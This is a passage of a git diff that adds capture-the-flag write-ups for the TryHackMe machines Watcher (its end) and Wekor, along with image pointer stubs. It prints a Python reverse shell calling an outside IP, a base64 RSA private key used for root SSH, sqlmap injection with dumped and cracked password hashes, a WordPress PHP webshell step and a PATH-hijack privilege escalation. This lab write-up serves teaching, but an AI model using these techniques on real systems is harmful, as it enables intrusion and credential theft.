+![](img/image-9.webp)
+
+By looking at the functioning of the script I discover that it is in two parts:
+
+
+```bash
+mat@watcher:~$ cat scripts/will_script.py
+cat scripts/will_script.py
+import os
+import sys
+from cmd import get_command
+
+cmd = get_command(sys.argv[1])
+
+whitelist = ["ls -lah", "id", "cat /etc/passwd"]
+
+if cmd not in whitelist:
+        print("Invalid command!")
+        exit()
+
+os.system(cmd)
+
+------------------------------------------
+
+mat@watcher:~$ cat scripts/cmd.py
+cat scripts/cmd.py
+def get_command(num):
+        if(num == "1"):
+                return "ls -lah"
+        if(num == "2"):
+                return "id"
+        if(num == "3"):
+                return "cat /etc/passwd"
+```
+And interestingly the second part of the script is editable by my user:
+
+
+```bash
+mat@watcher:~$ ls -la scripts
+ls -la scripts
+total 16
+drwxrwxr-x 2 will will 4096 Dec  3  2020 .
+drwxr-xr-x 6 mat  mat  4096 Dec  3  2020 ..
+-rw-r--r-- 1 mat  mat   133 Dec  3  2020 cmd.py
+-rw-r--r-- 1 will will  208 Dec  3  2020 will_script.py
+```
+So I add a python reverse shell at the beginning of the file.
+
+
+```bash
+echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.3.186",3456));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
+
+def get_command(num):
+        if(num == "1"):
+                return "ls -lah"
+        if(num == "2"):
+                return "id"
+        if(num == "3"):
+                return "cat /etc/passwd"' > scripts/cmd.py
+```
+Then I run the script with the following command:
+
+
+```bash
+sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1
+```
+I now have a reverse shell as a `will`.
+
+![](img/image-10.webp)
+
+And I can get the sixth flag back.
+
+
+```bash
+will@watcher:/home/will$ cat flag_6.txt
+cat flag_6.txt
+FLAG{but_i_thought_my_script_was_secure}
+```
+## Flag 7 - root
+
+When I try to find the seventh flag with the same method as for the previous ones, I can't find anything... It must be the root flag!
+
+I first use [linPeas](https://linpeas.sh) to try to find a way to do an elevation of privilege. After a few minutes of analysis of the result of the command. I find a strange file belonging to the root user but readable by my user :
+
+![](img/image-11.webp)
+
+I retrieve its contents and then decrypt it with the `base64` command.
+
+
+```bash
+will@watcher:/home/will$ cat /opt/backups/key.b64
+cat /opt/backups/key.b64
+LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBelBhUUZvbFFx
+OGNIb205bXNzeVBaNTNhTHpCY1J5QncrcnlzSjNoMEpDeG5WK2FHCm9wWmRjUXowMVlPWWRqWUlh
+WkVKbWRjUFZXUXAvTDB1YzV1M2lnb2lLMXVpWU1mdzg1ME43dDNPWC9lcmRLRjQKanFWdTNpWE45
+ZG9CbXIzVHVVOVJKa1ZuRER1bzh5NER0SXVGQ2Y5MlpmRUFKR1VCMit2Rk9ON3E0S0pzSXhnQQpu
+TThrajhOa0ZrRlBrMGQxSEtIMitwN1FQMkhHWnJmM0RORm1RN1R1amEzem5nYkVWTzdOWHgzVjNZ
+T0Y5eTFYCmVGUHJ2dERRVjdCWWI2ZWdrbGFmczRtNFhlVU8vY3NNODRJNm5ZSFd6RUo1enBjU3Jw
+bWtESHhDOHlIOW1JVnQKZFNlbGFiVzJmdUxBaTUxVVIvMndOcUwxM2h2R2dscGVQaEtRZ1FJREFR
+QUJBb0lCQUhtZ1RyeXcyMmcwQVRuSQo5WjVnZVRDNW9VR2padjdtSjJVREZQMlBJd3hjTlM4YUl3
+YlVSN3JRUDNGOFY3cStNWnZEYjNrVS80cGlsKy9jCnEzWDdENTBnaWtwRVpFVWVJTVBQalBjVU5H
+VUthWG9hWDVuMlhhWUJ0UWlSUjZaMXd2QVNPMHVFbjdQSXEyY3oKQlF2Y1J5UTVyaDZzTnJOaUpR
+cEdESkRFNTRoSWlnaWMvR3VjYnluZXpZeWE4cnJJc2RXTS8wU1VsOUprbkkwUQpUUU9pL1gyd2Z5
+cnlKc20rdFljdlk0eWRoQ2hLKzBuVlRoZWNpVXJWL3drRnZPRGJHTVN1dWhjSFJLVEtjNkI2CjF3
+c1VBODUrdnFORnJ4ekZZL3RXMTg4VzAwZ3k5dzUxYktTS0R4Ym90aTJnZGdtRm9scG5Gdyt0MFFS
+QjVSQ0YKQWxRSjI4a0NnWUVBNmxyWTJ4eWVMaC9hT0J1OStTcDN1SmtuSWtPYnBJV0NkTGQxeFhO
+dERNQXo0T3FickxCNQpmSi9pVWNZandPQkh0M05Oa3VVbTZxb0VmcDRHb3UxNHlHek9pUmtBZTRI
+UUpGOXZ4RldKNW1YK0JIR0kvdmoyCk52MXNxN1BhSUtxNHBrUkJ6UjZNL09iRDd5UWU3OE5kbFF2
+TG5RVGxXcDRuamhqUW9IT3NvdnNDZ1lFQTMrVEUKN1FSNzd5UThsMWlHQUZZUlhJekJncDVlSjJB
+QXZWcFdKdUlOTEs1bG1RL0UxeDJLOThFNzNDcFFzUkRHMG4rMQp2cDQrWThKMElCL3RHbUNmN0lQ
+TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj
+dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz
+K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu
+U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw
+NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2
+TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD
+WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0
+bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4
+NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG
+bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4
+STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t
+LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=
+```
+This is an `id_rsa`! Certainly the one of the root user. So I add the permissions to the file, then I launch an SSH session:
+
+![](img/image-12.webp)
+
+I now have a `root` reserse shell and I can recover the last flag.
+
+
+```bash
+root@watcher:~# cat flag_7.txt 
+FLAG{who_watches_the_watchers}
+```
diff --git a/content/writeup-ctf/writeup-wekor-thm/featured.png b/content/writeup-ctf/writeup-wekor-thm/featured.png
new file mode 100644
index 0000000..51dbe5c
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c5df83f38579999ce37f4c9c8a07349c6035af98a69df888e5a3715dd3d4a5f9
+size 184087
diff --git a/content/writeup-ctf/writeup-wekor-thm/featured.webp b/content/writeup-ctf/writeup-wekor-thm/featured.webp
new file mode 100644
index 0000000..e395d1c
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c52d60524837f1484f9e0812f7426813ebab23341876b4af47b5f32db24e9884
+size 112458
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-1.png b/content/writeup-ctf/writeup-wekor-thm/img/image-1.png
new file mode 100644
index 0000000..9ea947d
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:14afe59a7e5bf8fbf46e7486f676ab17dcd8da8110962ad5ce38ee3c1e83de90
+size 28343
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-1.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-1.webp
new file mode 100644
index 0000000..665379d
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5acc27aea2c913c17f8c3d3c849e50275f46f8001fd5b862e9457a560c8092b5
+size 24082
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-10.png b/content/writeup-ctf/writeup-wekor-thm/img/image-10.png
new file mode 100644
index 0000000..152b118
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:164ba22dc9832e403c424b153975946873d3ac0bc6fafe56bb3341a3b88e504e
+size 19825
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-10.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-10.webp
new file mode 100644
index 0000000..0c8b308
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c9e84d213b03026626077fb1117bb7c6b7d3bb80bac7aa029be299f2fad77eb0
+size 17514
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-11.png b/content/writeup-ctf/writeup-wekor-thm/img/image-11.png
new file mode 100644
index 0000000..74f43ad
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c4cd49f8324492627b7c6d200df3d1ec12f74f7fe800fe870d23604856d7bddf
+size 18533
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-11.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-11.webp
new file mode 100644
index 0000000..c2c72f2
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f08c26ba6f6cadfb75ce95d38ba1015f6c696571db38d4337319f87010187a43
+size 24508
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-12.png b/content/writeup-ctf/writeup-wekor-thm/img/image-12.png
new file mode 100644
index 0000000..1a32652
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4874bf2ffe81e7c122c84fb2813d198e4b4f332b4381b8eb00b750a7add0539e
+size 33414
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-12.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-12.webp
new file mode 100644
index 0000000..dc189b7
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bfd747ca9e69019d494bb79b3a5671eb3284ccf0ab943e616874b85ac4a5c0fb
+size 41824
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-2.png b/content/writeup-ctf/writeup-wekor-thm/img/image-2.png
new file mode 100644
index 0000000..ce7f6b5
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7337fdce830c8f06000d3731f67e3eadbd52d88b4e4e81a13b1b6eb879682986
+size 57670
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-2.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-2.webp
new file mode 100644
index 0000000..8cea94b
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3eda63a441ea7236a24d3bb845e9d3823839aed34c589ec5019c6e64e3e87c5c
+size 51028
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-3.png b/content/writeup-ctf/writeup-wekor-thm/img/image-3.png
new file mode 100644
index 0000000..761d496
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fbb086665dd2e3812d33c8a6c217d24958be110257fb60f7285d18f27bd197d4
+size 653719
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-3.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-3.webp
new file mode 100644
index 0000000..5a05fcf
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6d2e50f29e4cf4e154208060b055b19acceb45552ed2af2b7963c23bffb912d7
+size 82778
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-4.png b/content/writeup-ctf/writeup-wekor-thm/img/image-4.png
new file mode 100644
index 0000000..97bada3
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7a29b17a6a8dc413211bdef298c231f4974ef66e950a40304808ba23623639f5
+size 45596
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-4.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-4.webp
new file mode 100644
index 0000000..0e3c984
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ec61996217d9dc59d7d8f48f20f919ff59b28ece44e7798626b455b860c468a0
+size 42818
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-5.png b/content/writeup-ctf/writeup-wekor-thm/img/image-5.png
new file mode 100644
index 0000000..8ba2e63
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ab43a2a38df07938b6c2c26a909e819b367a15dcd7254011e284c8e48525b587
+size 58688
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-5.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-5.webp
new file mode 100644
index 0000000..a65300e
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2e8fca1016793473db9361d5957499b0307ca3d9a76c571e5022fb9622e40abe
+size 50654
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-6.png b/content/writeup-ctf/writeup-wekor-thm/img/image-6.png
new file mode 100644
index 0000000..a06daa3
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d7413101302c8913152020b1fc4a993db5376e89586c5235d4ea538438df68c8
+size 74642
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-6.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-6.webp
new file mode 100644
index 0000000..2df6c0f
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d79287646c6a0cc319771a0e0eaaa2819fbdbdb948490651892c09cbd8b29236
+size 23740
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-7.png b/content/writeup-ctf/writeup-wekor-thm/img/image-7.png
new file mode 100644
index 0000000..efa8946
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d82afec852cff1072ec7c5a528b3e8aeb5b61ec20b7538ef977815d45ed7d364
+size 32316
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-7.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-7.webp
new file mode 100644
index 0000000..847226c
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a785699e05e28983378ccfb07bade2ca8e6ebb48f2b2ac07a8a23d699fe5b755
+size 28508
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-8.png b/content/writeup-ctf/writeup-wekor-thm/img/image-8.png
new file mode 100644
index 0000000..fd98c13
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:96d865df6cbcfef9b8f7ad439243658a33494954e65414e2c2d98cf792f094ad
+size 15869
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-8.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-8.webp
new file mode 100644
index 0000000..3f9ea49
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b5279b851a4e2e4fad5603234fca9ca181a1b3e19bf890e4ea44703549c44c85
+size 30930
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-9.png b/content/writeup-ctf/writeup-wekor-thm/img/image-9.png
new file mode 100644
index 0000000..32c71a4
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f92eb4fb8f5a7f3240b3a00c0b9a209bbfe123476f4f60f8f17c30c73b6b056e
+size 27551
diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-9.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-9.webp
new file mode 100644
index 0000000..60f0874
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f1d4cfce647740116837196988e1605b8cb99c6e09c0a615f9e081b38e2c17ac
+size 31926
diff --git a/content/writeup-ctf/writeup-wekor-thm/index.md b/content/writeup-ctf/writeup-wekor-thm/index.md
new file mode 100644
index 0000000..cf2783e
--- /dev/null
+++ b/content/writeup-ctf/writeup-wekor-thm/index.md
@@ -0,0 +1,220 @@
+---
+title: "Writeup - Wekor (THM)"
+date: 2022-04-17
+slug: "writeup-wekor-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Wekor](https://tryhackme.com/room/wekorra) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+
+## Exploit
+
+At first I start by listing the pages of the website.
+
+![](img/image-2.webp)
+
+I find a `robots.txt` file in which the following pages are listed:
+
+
+```bash
+User-agent: *
+Disallow: /workshop/
+Disallow: /root/
+Disallow: /lol/
+Disallow: /agent/
+Disallow: /feed
+Disallow: /crawler
+Disallow: /boot
+Disallow: /comingreallysoon
+Disallow: /interesting
+```
+While exploring I come across the following message:
+
+
+```bash
+Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot ! 
+```
+So there is a site hosted in the `it-next` next folder:
+
+![](img/image-3.webp)
+
+After some research I find an `Applie coupon` field on the `it_cart.php` page. I get a query using burp, then I run `sqlmap` to extract the database list.
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ sqlmap -r request.txt --dbs --batch             
+        ___
+       __H__                                                                                                                                                                                                                                
+ ___ ___[(]_____ ___ ___  {1.6.4#stable}                                                                                                                                                                                                    
+|_ -| . [']     | .'| . |                                                                                                                                                                                                                   
+|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                                                   
+      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                           
+
+[...]
+web application technology: Apache 2.4.18
+back-end DBMS: MySQL >= 5.6
+[16:07:49] [INFO] fetching database names
+available databases [6]:
+[*] coupons
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] sys
+[*] wordpress
+
+[16:07:49] [INFO] fetched data logged to text files under '/home/d3vyce/.local/share/sqlmap/output/wekor.thm'
+
+[*] ending @ 16:07:49 /2022-04-13/
+```
+I find a `wordpress` database, I will try to extract it with the following command:
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ sqlmap -r request.txt -D wordpress --dump --batch
+[...]
+[4 entries]
++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
+| ID   | user_url                        | user_pass                                   | user_email        | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key                           |
++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
+| 1    | http://site.wekor.thm/wordpress | $P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.          | admin@wekor.thm   | admin      | 0           | admin        | admin         | 2021-01-21 20:33:37 | <blank>                                       |
+| 5743 | http://jeffrey.com              | $P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10          | jeffrey@wekor.thm | wp_jeffrey | 0           | wp jeffrey   | wp_jeffrey    | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 |
+| 5773 | http://yura.com                 | $P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/          | yura@wekor.thm    | wp_yura    | 0           | wp yura      | wp_yura       | 2021-01-21 20:35:27 | <blank>                                       |
+| 5873 | http://eagle.com                | $P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/ (xxxxxx) | eagle@wekor.thm   | wp_eagle   | 0           | wp eagle     | wp_eagle      | 2021-01-21 20:36:11 | <blank>                                       |
++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
+[...]
+```
+In the interval I find 4 user/password pairs. I put them in a file and I run `hashcat`.
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ hashcat -m 400 hash wordlist/rockyou.txt
+[...]
+$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/:xxxxxx	(eagle)                 
+$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10:rockyou	(jeffrey)             
+$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/:soccer13	(yura)
+[...]
+```
+After a few seconds, we find all the passwords except the one of Admin. Now that we have credentials, we need to find the wordpress site; I launch a subdomain scan.
+
+![](img/image-4.webp)
+
+I find the `site` subdomain, I add it to the `/etc/hosts`, then I go to the site. On this page, I find the following text:
+
+
+```bash
+Hi there! 
+Nothing here for now, but there should be an amazing website here in about 2 weeks, SO DON'T FORGET TO COME BACK IN 2 WEEKS! 
+- Jim 
+```
+This does not bring me much, so I launch a page scan on this subdomain.
+
+![](img/image-5.webp)
+
+After a few seconds I finally found the WordPress site!
+
+![](img/image-6.webp)
+
+So I go to the `wp-admin` page to connect to the admin panel. After trying the user `jeffrey`, I realize that he doesn't have admin permission, so I test the user `yura` and it works. I can now modify the content of the 404.php page of the twentytwentyone theme to add this [reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php).
+
+By accessing the following page I execute the php code :
+
+
+```bash
+http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php
+```
+I now have a reverse shell, but I don't have access to the first flag.
+
+![](img/image-7.webp)
+
+So I look if I can't find a file with an interesting service to change the user. In the open ports, I find the port 11211 :
+
+![](img/image-8.webp)
+
+After some research I find the following page of the [HackTricks](https://book.hacktricks.xyz/pentesting/11211-memcache) blog. After some experimentation, I manage to get the credencials of the user Orka in the cache.
+
+![](img/image-9.webp)
+
+I can now change the user and get the first flag back.
+
+
+```bash
+Orka@osboxes:~$ cat user.txt
+cat user.txt
+1a26a6d51c0172400add0e297608dec6
+```
+## Privilege escalation
+
+I start by checking the user's authorization. Interestingly, my user has the right to run the `bitcoin` script with root rights.
+
+![](img/image-10.webp)
+
+I try to launch the script but without success, it needs a password to launch it.
+
+![](img/image-11.webp)
+
+So I try to extract the strings from the program and I find the following in the result:
+
+
+```bash
+Orka@osboxes:~/Desktop$ strings bitcoin
+[...]
+Enter the password : 
+password
+Access Denied... 
+Access Granted...
+                        User Manual:
+Maximum Amount Of BitCoins Possible To Transfer at a time : 9 
+Amounts with more than one number will be stripped off! 
+And Lastly, be careful, everything is logged :) 
+Amount Of BitCoins : 
+ Sorry, This is not a valid amount! 
+python /home/Orka/Desktop/transfer.py %c
+[...]
+```
+The password to use the program would be `password` and then there is the execution of a python script. What is interesting is the use of python without using a relative route. This combined with the fact that I have write permissions in the `/usr/sbin/python` folder which is in the `$PATH` variable, I will be able to create a custom version of the python program.ndes suivante :
+
+
+```bash
+touch /usr/sbin/python
+echo '#!/bin/bash' > /usr/sbin/python
+echo '/bin/bash' >> /usr/sbin/python
+chmod +x /usr/sbin/python
+```
+I now run the `bitcoin` program with sudo and enter the password.
+
+![](img/image-12.webp)
+
+I am now root of the machine and I can get the last flag.
+
+
+```bash
+root@osboxes:~/Desktop# cat /root/root.txt
+cat /root/root.txt
+f4e788f87cc3afaecbaf0f0fe9ae6ad7
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Sanitizing Inputs must be implemented to avoid SQL injections
+- Use strong passwords
+- Set up Memcached authentication
+- Use absolute paths when using programs in scripts
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-1.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.png
new file mode 100644
index 0000000..3d87578
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8b2af0845e1cb935f456d9760c16fdc8ab573da7d74425cb0b78aab1c2ec290a
+size 37989
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp
new file mode 100644
index 0000000..d798ca9
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ba9e22efc1fcb2eb4cee19267ac0716b6edff8fd4a3e2288aa46200411a9b7c1
+size 33624
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-10.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.png
new file mode 100644
index 0000000..2edbb4b
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d41d93a8d1a4129aab20063868b0276eba78dc8cbc4fa6d2aec1913a4d008094
+size 16356
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp
new file mode 100644
index 0000000..a190cc0
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:dab120c1f48cf74393784e0233e89078ccda92169a4b7cb5465745321cfaa765
+size 18404
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-11.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.png
new file mode 100644
index 0000000..abf6ef8
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fef6f0ae37931c6d61e9396d502c6b76312862e1d6ce05ca9b1114899b40fb66
+size 64633
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp
new file mode 100644
index 0000000..0976621
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d2aeade34849884c6cff93e69bf1f366b111ede78b94788e75d2e3d9a30febcf
+size 48802
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-12.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.png
new file mode 100644
index 0000000..a3ee4c2
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:114c3671044cc11c3ad5701cfbc1d3d4d10e63bd84f5311351c10e20ecfb0259
+size 9896
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp
new file mode 100644
index 0000000..a622573
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6b93f3100a1c246af9e5ca3db555fc692ca02285c09f448b5724f8336d315dc2
+size 9380
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-13.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.png
new file mode 100644
index 0000000..727b38c
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.png
@@ -0,0 +1,3 @@
